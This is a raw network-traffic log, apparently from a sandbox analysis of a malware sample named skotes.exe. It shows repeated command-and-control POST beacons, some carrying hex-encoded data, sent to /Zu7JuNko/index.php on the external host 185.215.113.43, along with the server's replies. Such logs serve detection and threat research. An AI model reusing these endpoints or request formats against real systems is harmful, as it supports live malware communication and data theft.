                                              Nov 22, 2024 17:13:09.966839075 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.849710185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:11.737935066 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:13.069196939 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.849711185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:14.704283953 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:16.100543022 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.849712185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:17.862495899 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:19.284539938 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.849713185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:20.955998898 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:22.337306023 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.849714185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:24.095844984 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:25.472306013 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.849715185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:27.173180103 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:28.507762909 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.849716185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:30.256043911 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:31.594407082 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.849717185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:33.227725983 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:34.610512972 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.849718185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:36.349973917 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:37.739207983 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.849720185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:39.393069029 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:40.989097118 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.849721185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:42.740603924 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:44.299521923 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.849722185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:45.944297075 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:47.563025951 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.849723185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:49.305599928 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:51.051986933 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.849724185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:52.678206921 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:13:54.062625885 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.849725185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:55.806749105 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:13:57.203372002 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:13:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.849726185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:13:58.834858894 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:14:00.270227909 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.849727185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:02.054657936 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:14:03.398457050 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.849728185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:05.052788019 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:14:06.448580980 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.849729185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:08.212848902 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:14:09.558049917 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.849730185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:11.208610058 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:14:12.653995991 CET196INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.849731185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:14.401375055 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                              Nov 22, 2024 17:14:15.779257059 CET219INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.849732185.215.113.43808076C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 22, 2024 17:14:17.417208910 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
